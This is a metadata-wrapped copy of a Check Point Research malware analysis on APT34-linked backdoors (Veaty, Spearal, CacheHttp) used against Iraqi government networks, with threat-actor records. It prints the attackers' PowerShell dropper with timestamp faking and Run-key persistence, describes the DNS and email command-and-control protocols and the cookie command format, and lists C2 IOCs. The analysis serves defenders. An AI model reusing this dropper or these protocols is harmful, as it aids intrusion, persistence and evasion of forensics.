{ "id": "a57f36c4-2bf5-45f7-bcc3-f1111cbc2aff", "created_at": "2026-04-06T00:06:09.46496Z", "updated_at": "2026-04-10T13:12:55.347813Z", "deleted_at": null, "sha1_hash": "9174480b3e9b7e867632197ace06f49012d4dd82", "title": "Targeted Iranian Attacks Against Iraqi Government Infrastructure - Check Point Research", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 126686, "plain_text": "Targeted Iranian Attacks Against Iraqi Government Infrastructure\r\n- Check Point Research\r\nBy stcpresearch\r\nPublished: 2024-09-11 · Archived: 2026-04-05 16:33:47 UTC\r\nKey Findings\r\nCheck Point Research discovered a new set of malware called Veaty and Spearal that was used in attacks\r\nagainst different Iraqi entities including government networks.\r\nThe malware samples described in this report use a variety of techniques including a passive IIS backdoor,\r\nDNS tunneling, and C2 communication via compromised email accounts.\r\nThe passive IIS backdoor appears to be a newer variant of the backdoor reported by ESET as employed by\r\nthe IIS Group 2 (also attributed by Symantec to GreenBug aka APT34).\r\nThe malware has multiple ties to previously described APT34 malware families such as Karkoff, Saitama,\r\nand IIS Group 2 operating in the same region. Those malware families are affiliated with tun (MOIS).\r\nIntroduction\r\nCheck Point Research (CPR) has been closely monitoring a campaign targeting the Iraqi government over the past\r\nfew months. This campaign features a custom toolset and infrastructure for specific targets and uses a combination\r\nof techniques commonly associated with Iranian threat actors operating in the region.\r\nThe toolset used in this targeted campaign employs unique Command and Control (C2) mechanisms, including a\r\ncustom DNS tunneling protocol and a tailor-made email based C2 channel. The C2 channel uses compromised\r\nemail accounts within the targeted organization, indicating that the threat actor successfully infiltrated the victim’s\r\nnetworks.\r\nUsing such distinctive C2 mechanisms, along with other attack-related artifacts such as malicious IIS modules,\r\nsuggests possible connections to APT34, an Iranian MOIS-affiliated group. The malware families and\r\nmethodology employed overlap with Karkoff, Saitama, and IIS Group2 clusters, all of which have ties to APT34.\r\nInitial Infection\r\nThe initial infection for the newly discovered campaign is kicked off by a series of files that use double extensions\r\nto masquerade as document attachments. Examples of the file names\r\ninclude  Avamer.pdf.exe ,  Protocol.pdf.exe ,  IraqiDoc.docx.rar . We also observed an infection that starts\r\nwith an installer called  ncms_demo.msi . All these files were uploaded to VirusTotal (VT) from Iraq in the months\r\nof March-May 2024. The initial infection likely started from some type of social engineering.\r\nFigure 1 - The installer used to deploy the Spearal malware bears the logo of the Iraqi General\r\nSecretariat of the Council of Ministers.\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 1 of 13\n\nFigure 1 – The installer used to deploy the Spearal malware bears the logo of the Iraqi General\r\nSecretariat of the Council of Ministers.\r\nThese files triggered the execution of PowerShell or Pyinstaller scripts which dropped two additional files: the\r\nmalware executable (EXE) file and its corresponding configuration. Notably, the scripts manipulated file write and\r\naccess times, and added entries to the Windows registry under  \\CurrentVersion\\Run  for persistence. An example\r\nof the Powershell script used to deploy the next stage:\r\n$ex_dir=\"c:\\ProgramData\\System Documents\";\r\n$ex_path=$ex_dir+\"\\FortiClients.exe\";\r\n$con_path=$ex_dir+\"\\FortiClients.exe.config\";\r\n$ex_decoded=[System.Convert]::FromBase64String($a1);\r\n$conf_decoded=[System.Convert]::FromBase64String($a2);S\r\n[IO.File]::WriteAllBytes($ex_path,$ex_decoded)\r\n[IO.File]::WriteAllBytes($con_path,$conf_decoded)\r\n$ex_item=Get-Item $ex_path;\r\n$ex_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\n$ex_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$con_item=Get-Item $con_path;\r\n$con_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\n$con_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$dir_item=Get-Item $ex_dir;\r\n$dir_item.LastAccessTime=\"01/08/2022 06:11:47\";\r\n$dir_item.LastWriteTime=\"01/08/2022 06:11:47\";\r\n[System.Diagnostics.Process]::Start( $ex_path);\r\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Forti Startup\" -\r\nValue $ex_path;\r\n$a1=\"TVqQA[truncated]\"; $a2=\"PD94b[truncated]\"; $ex_dir=\"c:\\ProgramData\\System Documents\"; mkdir\r\n$ex_dir; $ex_path=$ex_dir+\"\\FortiClients.exe\"; $con_path=$ex_dir+\"\\FortiClients.exe.config\"; $ex_decoded=\r\n[System.Convert]::FromBase64String($a1); $conf_decoded=[System.Convert]::FromBase64String($a2);S\r\n[IO.File]::WriteAllBytes($ex_path,$ex_decoded) [IO.File]::WriteAllBytes($con_path,$conf_decoded)\r\n$ex_item=Get-Item $ex_path; $ex_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 2 of 13\n\n$ex_item.LastWriteTime=\"05/08/2022 10:12:13\"; $con_item=Get-Item $con_path;\r\n$con_item.LastAccessTime=\"05/08/2022 10:12:13\"; $con_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$dir_item=Get-Item $ex_dir; $dir_item.LastAccessTime=\"01/08/2022 06:11:47\";\r\n$dir_item.LastWriteTime=\"01/08/2022 06:11:47\"; [System.Diagnostics.Process]::Start( $ex_path); New-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Forti Startup\" -Value\r\n$ex_path;\r\n$a1=\"TVqQA[truncated]\";\r\n$a2=\"PD94b[truncated]\";\r\n$ex_dir=\"c:\\ProgramData\\System Documents\";\r\nmkdir $ex_dir;\r\n$ex_path=$ex_dir+\"\\FortiClients.exe\";\r\n$con_path=$ex_dir+\"\\FortiClients.exe.config\";\r\n$ex_decoded=[System.Convert]::FromBase64String($a1);\r\n$conf_decoded=[System.Convert]::FromBase64String($a2);S\r\n[IO.File]::WriteAllBytes($ex_path,$ex_decoded)\r\n[IO.File]::WriteAllBytes($con_path,$conf_decoded)\r\n$ex_item=Get-Item $ex_path;\r\n$ex_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\n$ex_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$con_item=Get-Item $con_path;\r\n$con_item.LastAccessTime=\"05/08/2022 10:12:13\";\r\n$con_item.LastWriteTime=\"05/08/2022 10:12:13\";\r\n$dir_item=Get-Item $ex_dir;\r\n$dir_item.LastAccessTime=\"01/08/2022 06:11:47\";\r\n$dir_item.LastWriteTime=\"01/08/2022 06:11:47\";\r\n[System.Diagnostics.Process]::Start( $ex_path);\r\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Forti Startup\" -V\r\nThe next stage introduces one of two new malware families: Veaty or Spearal and their configurations. Both\r\nconfiguration files are structured as XML files with base64-encoded keys and values.\r\nFigure 2 - Spearal Config (decoded).\r\nFigure 2 – Spearal Config (decoded).\r\nSpearal backdoor\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 3 of 13\n\nThe Spearal malware is a .NET backdoor that utilizes DNS tunneling for communication. The Command and\r\nControl (C2) server is stored as  srvip  in the configuration file, and the malware sends TXT queries to this\r\nserver.\r\nThe data transferred between the malware and the C2 server is encoded in the subdomains of DNS queries using a\r\ncustom Base32 scheme. The domain used is either specified in the malware’s configuration  domn  field or\r\ndefaults to iqwebservice[.]com .\r\nFigure 3 - The infection chain installing the Spereal malware.\r\nFigure 3 – The infection chain installing the Spereal malware.\r\nThe queries sent by the Spereal malware are detailed below, illustrating how data is transmitted to and from the C2\r\nserver.\r\n1. Initial Authentication:\r\nQuery:  base32encode(\"auth:;\u003cusername\u003e\")\r\nResponse:  “stc:;base32encode(\u003ctarget_comm_id\u003e)”  – This provides the  target_comm_id  which\r\nis the victim identifier used in subsequent messages.\r\n2. Requesting Commands:\r\nQuery:  base32encode(\"cmd:;\u003ctarget_comm_id\u003e\")\r\nResponse: Contains one of these commands to execute.\r\nCommandS Description\r\ncmd:;:; Executes a PowerShell command.\r\ndl:;:; Reads a file and sends its base32-encoded data.\r\nup:;:; Retrieves content from the C2 to write to a file.\r\n3. Sending Command Results:\r\nFirst Message (Command Result Start message):\r\nQuery:  base32encode(\"crs:;\u003ccmd_id\u003e:;\u003cnum of chunks\u003e\")  – The maximum length for a\r\nchunk is based on the value  chunk_len  in the configuration (the default value is 30).\r\nResponse:  “ok” .\r\nBody Messages (Command Result Body message):\r\nQuery:  base32encode(\"crb:;\u003ccmd_id\u003e:;\u003cchunk_index\u003e:;\u003cchunk_value\u003e\") .\r\nResponse (Result OK message):  “rok:;\u003ccmd_id\u003e:;\u003cchunk_index\u003e”  or  “end” .\r\nEnd Results (Command Result End message):\r\nQuery:  base32encode(\"cre:;\u003ccmd_id\u003e\") .\r\nVeaty backdoor\r\nFigure 4 - The infection chain installing Veaty malware.\r\nFigure 4 – The infection chain installing Veaty malware.\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 4 of 13\n\nVeaty is a .NET backdoor that utilizes emails for C2 communications. It can upload and download files and\r\nexecute commands. In the sample we analyzed, the malware leverages compromised email accounts at the gov-iq.net domain to execute its commands.\r\nThe infection begins with disabling certificate verification. This is the process that checks whether an SSL/TLS\r\ncertificate is valid and trusted when establishing a secure connection to a server and allows the malware to\r\ncommunicate with the Exchange server (its C2) without being detected by certificate-based security measures.\r\nThe malware uses information from its configuration file in various aspects of communication with its C2 server:\r\nFigure 5 – Veaty Configuration (decoded).\r\nCommunication Channel Initialization\r\nThe malware determines which server to use and how to communicate with the server based on different\r\nhardcoded values. The malware has 4 flags (listed below) and attempts to communicate using each flag with a\r\nvalue of “True” until the communication with the exchange server succeeds.\r\nThe flags are used in the order in which they appear.\r\n1. try_defaultcred – Tries to communicate without username and password. The malware tries to\r\ncommunicate with each domain in the following order:\r\n1. internal_domain  field from the configuration file\r\n2. external_domain  field from the configuration file\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 5 of 13\n\n3. the exchange server in the path on the compromised machine( https:///EWS/exchange.asmx )\r\n2. try_hardcodedCreds – Uses the same list of servers, but the malware tries to communicate using\r\ncredential values (username and password) from the “ creds ” key in the config file.\r\n3. try_externalCreds – Tries to communicate using values from the “ external_creds ” key in the config\r\nfile. The C2 server is based on a hardcoded value named  mail_domain_external_known ,which in our\r\nsample is equal to “ mail.miicrosoft.com ”.\r\n4. try_trustedNetwork – Tries to communicate using values from the “ trusted_networks_creds ” key in\r\nthe config file. The C2 server address is taken from a hardcoded value\r\nnamed  mail_domain_external_trusted  which in our case is also equal to “ mail.miicrosoft.com ”.\r\nCommand and Control Communication\r\nVeaty uses targeted mailboxes as its means of C2 communication. To prepare those mailboxes as C2 servers, it\r\ninitializes a new rule so all its commands and responses will be moved to a relevant folder. Veaty has 3 values it\r\nuses to organize those emails:\r\n1. communicationFolder\r\n2. receive_sign\r\n3. placeForSignature  – The value can be “ subject ”, “ body ” or “ subjectorbody ”.\r\nThe malware uses these values to search for a rule containing the  receive_sign  string in\r\nthe  placeForSignature  field, with the target folder specified by the  communicationFolder  value. In this\r\nspecific instance, it checks if there is a rule searching for emails with the string “PMO” in the subject field and\r\nmoves them to the  deletedItems  folder.\r\nIf the rule doesn’t exist, the malware adds a new rule with this parameter. The rule’s name is taken from\r\nthe  inboxRuleName  hardcoded field, which in our case is “ MicosoftDefaultRules ”. As a result, any email with\r\nthe predefined string in the subject will be moved to the  deletedItems  folder. This setup helps the attackers use\r\nthose mailboxes as C2 channels but reduces the chance of being discovered by the account holder.\r\nVeaty has two types of messages: Alive messages, otherwise referred to as “HeartBeat” messages, and Command\r\nmessages.\r\nAlive messages are dispatched as emails in the following format:\r\nSubject:  alive_msg_subj  hardcoded value\r\nBody: ” alive_msg_body ” + “ ID: ” + base64( \u003cComputerName\u003e:\u003cUserDnsDomain\u003e:\u003cUserName\u003e ).\r\nThe recipient for Alive messages is based on the  alive_mail  value in the configuration file, and the message is\r\nsent at intervals (in minutes) corresponding to the value of  al_time  from the configuration file.\r\nFigure 6 - Example of an Alive message.\r\nFigure 6 – Example of an Alive message.\r\nCommand messages that match the rule established by the malware described above are searched for in the C2\r\nmailbox. The command itself can be in the “ attachment ” (which was used in this specific campaign) or “ body ”\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 6 of 13\n\nof the mail, based on the hardcoded value  ItemPlace . The commands are AES-encrypted with\r\nthe  enc_key  value from the configuration file and base64-encoded. The commands are in the following\r\nformat:  \u003ccommand_id\u003e;\u003ccommand\u003e .\r\nCommand types:\r\nDownload File – Commands that begin with the value “ this is my file content ” hardcoded in the\r\nmalware. The malware gets a file path and base64-encoded content to write to the file, with content\r\nsegments separated by ‘’.\r\nUpload File – Commands that begin with the value “ this is my required file path ” hardcoded in the\r\nfile. In this case, the malware gets a file path to read from and sends back its base64-encoded content to the\r\nC2.\r\nExecute command – All other commands are executed directly using PowerShell.\r\nThe results are sent to the sender of the command mail and encrypted similarly. The format of the results email is\r\nalso based on  ItemPlace  and the  placeForSignature  values:\r\nHardcoded values Subject Body Attachment\r\nItemPlace  =\r\n“attachment”,  placeForSignature  =\r\n“subject”\r\nsend_sign  value\r\nfrom the\r\nconfiguration file\r\n(in our case\r\n“Email”).\r\n“Hey There! find\r\nyour results in\r\nthe attachment”\r\n(hardcoded\r\nvalue).\r\nEncrypted\r\ndata with\r\nthe filename\r\n“smile.txt”\r\n(hardcoded\r\nvalue).\r\nItemPlace  =\r\n“attachment”,  placeForSignature  =\r\n“body”\r\n“Hey There! find\r\nyour results in\r\nthe attachment”\r\n(hardcoded\r\nvalue).\r\nsend_sign  value\r\nfrom the\r\nconfiguration file\r\n(in our case\r\n“Email”).\r\nEncrypted\r\ndata with\r\nthe filename\r\n“smile.txt”\r\n(hardcoded\r\nvalue).\r\nItemPlace  =\r\n“body”,  placeForSignature  =\r\n“subject”\r\nsend_sign  value\r\nfrom the\r\nconfiguration file\r\n(in our case\r\n“Email”).\r\nEncrypted data as\r\nthe body of the\r\nemail.\r\n–\r\nThe malware also contains several functions and variables it doesn’t use, which might indicate that it is based on\r\ndifferent code and that the authors left in some extraneous data.\r\nSSH malware\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 7 of 13\n\nAnalysis of the threat actors’ infrastructure led to the discovery of a similarly formed XML config file, likely used\r\nby a third backdoor to facilitate SSH tunneling. The IP address mentioned in the configs,  37.1.213[.]152 , is\r\nassociated with the domain  mofaiq[.]com , pointing to the same targeting of Iraqi government entities.\r\nFigure 7 - SSH tunneling malware config file.\r\nFigure 7 – SSH tunneling malware config file.\r\nAttribution\r\nThe Veaty and Spearal Tactics, Techniques and Procedures (TTPs) are very similar to two other malware families,\r\nKarkoff and Saitama, which are attributed to the same APT34 actor.\r\nTTP and Code overlaps:\r\nVeaty malware uses techniques and variable names similar to those previously used by Karkoff malware.\r\nBoth malware use email tunneling in the same way: searching for emails with a pre-configured subject\r\n( Dropbox  in Karkoff,  PMO  in Veaty), extracting from these emails commands to execute, and then\r\ndeleting the email. The implementation of these methods is also similar.\r\nThe Karkoff malware communicated through compromised email addresses belonging to Lebanese\r\ngovernment entities, similar to Veaty, which used compromised mail accounts of Iraqi government entities.\r\nSpearal malware uses techniques that resemble the ones used by Saitama malware: they both use base32-\r\nencoded commands passed through DNS tunneling. Saitama was used in an attack that targeted Jordanian\r\ngovernment entities.\r\nasiacall.net , a C2 domain associated with this campaign, bears similarities to domain name\r\nconventions used by Saitama malware.\r\nUsing similar tools, techniques, and infrastructure against targets from the same geographical region leads us to\r\nconclude that this operation is carried out by an actor with a similar nexus to those who carried out previous\r\nKarkoff and Saitama attacks.\r\nHTTP-Based backdoors\r\nWhile investigating the previously mentioned samples, we encountered an intriguing IIS module backdoor\r\nnamed  CacheHttp.dll  that likely targeted the same organizations in Iraq. This module represents a newer\r\niteration of malware that was previously attributed to IIS Group 2 and GreenBug.\r\nThe backdoor listens for  OnGlobalPreBeginRequest  events within the IIS server and executes its main\r\nfunctionality when these events occur.\r\nThe execution process begins by checking if the  Cookie  header is present in incoming HTTP requests and reads\r\nuntil the ;  sign. The main parameter is  F=0/1  which indicates whether the backdoor initializes its command\r\nconfiguration ( F=1 ) or runs the commands based on this configuration ( F=0 ).\r\nIf F=1, the configuration parameters are included in the Cookie header after the  ,  character as a series of key-value pairs in the following format:  Cookie: F=1,a=[u/d/r/r2/r3]\u0026b=[Shell_Command]\u0026k=[Session_Key]\u0026f=\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 8 of 13\n\n[File]\r\nThere are four keys:\r\na : Specifies the action (e.g.,  u ,  d ,  r ,  r2 ,  r3 ) discussed below.\r\nb : Encrypted shell command.\r\nk : Session Key encrypted with an RSA Private Key.\r\nf : Encrypted filename for download.\r\nSupported commands:\r\nCommand Description Parameters Return Value\r\nu Write content to a file.\r\n‘f’ – filename,\r\n‘b’ – data to\r\nwrite\r\nThe string ‘OK’\r\nencrypted.\r\nd Read data from a file. ‘f’ – filename\r\nbase64 encoded\r\nand encrypted\r\ndata of the file.\r\nr Run command using  popen. ‘b’ = command\r\nEncrypted result\r\nof the command.\r\nr2\r\nRun command\r\nusing  CreateProcessW  into a Pipe\r\nand read from it.\r\n‘b’ = command\r\nEncrypted result\r\nof the command.\r\nr3\r\nCreate a pipe\r\nnamed  \"\\\\.\\pipe\\iis\"  and\r\nwrite/read data from there.\r\n‘b’ = command\r\nEncrypted result\r\nof the data read\r\nfrom the pipe.\r\nThe ‘ b ’ and ‘ f ’ values are encrypted with AES-CBC using the ‘ k ’ value and base64-encoded. The ‘k’ value\r\nis encrypted with an RSA private key that the attacker possesses, and the public key for this RSA private key is\r\nhardcoded inside the file.\r\nThe communication from the IIS backdoor to the C2 is encrypted in a similar way. A random AES-CBC key is\r\ngenerated and used to encrypt the data. The key itself is then encrypted with a public RSA key hardcoded in the\r\nfile in which the attackers have the private key and then sent together with the data to the C2 server.\r\nEvolution from IIS group2 and RGdoor\r\nCacheHttp.dll  represents an evolved version of the IIS Group2 backdoor. While its core functionality remains\r\nsimilar, it introduces two new additional methods for command execution: r2 and r3.\r\nNotably, the communication flow has undergone a significant change. Unlike the Group2 variant, which\r\ncommunicates via the HTTP body,  CacheHttp.dll  now communicates through the  Cookie  field. This shift\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 9 of 13\n\naligns with the communication technique observed in the older RGDoor, another IIS backdoor attributed to\r\nAPT34. In RGDoor, the C2 communication format is:\r\nCookie: RGSESSIONID=\u003cEncrypted command\u003e\r\nAnother interesting sample, uploaded to VT from Pakistan in February 2023, represents a straightforward IIS\r\nbackdoor with minimal functionality. Specifically, it offers four distinct methods to execute commands. Notably,\r\nthis sample’s communication method shares similarities with  CacheHttp . Commands are transmitted within\r\nthe  Cookie  field in this format:\r\nCookie:_sessionsID=hex(value),c=?,t=?,p=[1/2/3/4]\r\nThe Pakistani sample utilizes four distinct methods for executing commands, suggesting a potential connection\r\nto CacheHttp, which employs three command execution methods (r, r2, r3). The code and implementation\r\ntechniques show similarities between the two backdoors.\r\nFigure 9 – Comparison between the two code samples\r\nFigure 9 – Comparison between the two code samples\r\nIn addition, the close relationship between APT34 and Greenbug, and the overlapping TTPs and targets in the\r\nMiddle East, suggests that all these tools, CacheHttp, IISGroup 2, and RGDoor, might be variants of the same\r\ntool.\r\nFigure 10 - Evolution of IIS backdoors from RGDoor to CacheHTTP.\r\nFigure 10 – Evolution of IIS backdoors from RGDoor to CacheHTTP.\r\nHTTP Listener – listner\r\nlistner  is another passive backdoor uploaded to VT in the same context as the previously described malware.\r\nThis tool is a basic .NET-based HTTP listener, registered to handle incoming HTTP requests to the\r\nURL  https://[REDACTED].gov.iq/owa/auth/login . Incoming GET requests with the\r\nparameter  snmflwkejrhgsey  will execute its value via CMD, sending back the response in HTML format.\r\nFigure 11 – HTTP Listener Malware.\r\nFigure 11 – HTTP Listener Malware.\r\nDespite its simplicity, this malware once again highlights the threat actor’s inclination towards passive backdoors.\r\nConclusion\r\nThis campaign against Iraqi government infrastructure highlights the sustained and focused efforts of Iranian\r\nthreat actors operating in the region. The custom toolset and dedicated infrastructure observed in this operation are\r\nsimilar to techniques commonly associated with APT34, an Iranian MOIS-affiliated threat actor.\r\nThe deployment of a custom DNS tunneling protocol and an email-based C2 channel leveraging compromised\r\naccounts highlights the deliberate effort by Iranian actors to develop and maintain specialized Command and\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 10 of 13\n\nControl mechanisms. This distinctive blend of straightforward tools, written in .NET, combined with sophisticated\r\nC2 infrastructure, is common among similar Iranian threat actors.\r\nThe discovery of the Veaty and Spearal malware families and the presence of a passive IIS backdoor aligns this\r\ncampaign with previously identified activity clusters like Karkoff, Saitama, and IISGroup2. These artifacts further\r\nsolidify the link between this operation and APT34’s known tactics, techniques, and procedures.\r\nProtections:\r\nHarmony Endpoint\r\nAPT.Win.OilRig.F\r\nAPT.Win.OilRig.WA.G\r\nAPT.Win.OilRig.H\r\nThreat Emulation\r\nAPT.Wins.Oilrig.ta.B/C/D/E\r\nAB\r\nBackdoor.WIN32.CacheHttp.A/B/C\r\nBackdoor.WIN32.Spearal.A/B/C/D/E/F\r\nIOCs\r\na79e4424116dc0a76a179507ac914578\r\n1f1aaaf32be03ae7beb9d49f02de7669\r\nb817309621e43004b9f32c96d52dc2a0\r\nb5de3c4c582db7c2d2ce31c67cba0510\r\n66126dc088be2699fd55ae7eff5e6e15\r\nfb164cdf119b0d4427bdcb51b45075b1\r\n7b62b055285b1c08e11ac98b3d3954bc\r\n70ff5d4fc9957abff4c5577e22b3da27\r\n4F4A06F63D34881D88CD70552E909748\r\n85f025474271fbcc43af1e2203d10b66\r\n2badde184d78ed901b4b2282b285717c\r\nd56b5fd6b8976c91d2537d155926afff\r\nb1c93c7f5d89996d64a7f933f138e8b0\r\na70a7cfae52304a36fe1547b5a441d7a\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 11 of 13\n\n79cc8730d748a884cc666b95ee9fed36\r\nd542b320b10d443a454c305e9818f5f6\r\n58e67cdc9ef57805f45ba554bdccb3b1\r\n0f9d0b03254830714654c2ceb11a7f5d\r\n8afdfd6d035b3c616dc37894a15206b4\r\n185.76.78[.]177 91.132.95[.]117 151.236.17[.]231 37.1.213[.]152 206.206.123[.]176 194.68.32[.]114\r\niqwebservice[.]com mofaiq[.]com asiacall[.]net spacenet[.]fun Veaty and spearal:\r\na79e4424116dc0a76a179507ac914578 1f1aaaf32be03ae7beb9d49f02de7669\r\nb817309621e43004b9f32c96d52dc2a0 b5de3c4c582db7c2d2ce31c67cba0510\r\n66126dc088be2699fd55ae7eff5e6e15 fb164cdf119b0d4427bdcb51b45075b1\r\n7b62b055285b1c08e11ac98b3d3954bc 70ff5d4fc9957abff4c5577e22b3da27\r\n4F4A06F63D34881D88CD70552E909748 85f025474271fbcc43af1e2203d10b66\r\n2badde184d78ed901b4b2282b285717c Listner: d56b5fd6b8976c91d2537d155926afff CacheHttp:\r\nb1c93c7f5d89996d64a7f933f138e8b0 a70a7cfae52304a36fe1547b5a441d7a\r\n79cc8730d748a884cc666b95ee9fed36 d542b320b10d443a454c305e9818f5f6\r\n58e67cdc9ef57805f45ba554bdccb3b1 0f9d0b03254830714654c2ceb11a7f5d\r\n8afdfd6d035b3c616dc37894a15206b4\r\n185.76.78[.]177\r\n91.132.95[.]117\r\n151.236.17[.]231\r\n37.1.213[.]152\r\n206.206.123[.]176\r\n194.68.32[.]114\r\niqwebservice[.]com\r\nmofaiq[.]com\r\nasiacall[.]net\r\nspacenet[.]fun\r\nVeaty and spearal:\r\na79e4424116dc0a76a179507ac914578\r\n1f1aaaf32be03ae7beb9d49f02de7669\r\nb817309621e43004b9f32c96d52dc2a0\r\nb5de3c4c582db7c2d2ce31c67cba0510\r\n66126dc088be2699fd55ae7eff5e6e15\r\nfb164cdf119b0d4427bdcb51b45075b1\r\n7b62b055285b1c08e11ac98b3d3954bc\r\n70ff5d4fc9957abff4c5577e22b3da27\r\n4F4A06F63D34881D88CD70552E909748\r\n85f025474271fbcc43af1e2203d10b66\r\n2badde184d78ed901b4b2282b285717c\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 12 of 13\n\nListner:\r\nd56b5fd6b8976c91d2537d155926afff\r\nCacheHttp:\r\nb1c93c7f5d89996d64a7f933f138e8b0\r\na70a7cfae52304a36fe1547b5a441d7a\r\n79cc8730d748a884cc666b95ee9fed36\r\nd542b320b10d443a454c305e9818f5f6\r\n58e67cdc9ef57805f45ba554bdccb3b1\r\n0f9d0b03254830714654c2ceb11a7f5d\r\n8afdfd6d035b3c616dc37894a15206b4\r\nSource: https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nhttps://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/" ], "report_names": [ "iranian-malware-attacks-iraqi-government" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed", "created_at": "2022-10-25T16:07:23.918534Z", "updated_at": "2026-04-10T02:00:04.789509Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [ "Greenbug", "Volatile Kitten" ], "source_name": "ETDA:Greenbug", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "25896473-161f-411f-b76a-f11bb26c96bd", "created_at": "2023-01-06T13:46:38.75749Z", "updated_at": "2026-04-10T02:00:03.090307Z", "deleted_at": null, "main_name": "CHRYSENE", "aliases": [ "Greenbug" ], "source_name": "MISPGALAXY:CHRYSENE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6bba8e81-73af-4010-86dc-d43c408ca342", "created_at": "2023-01-06T13:46:38.553459Z", "updated_at": "2026-04-10T02:00:03.021597Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [], "source_name": "MISPGALAXY:Greenbug", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted 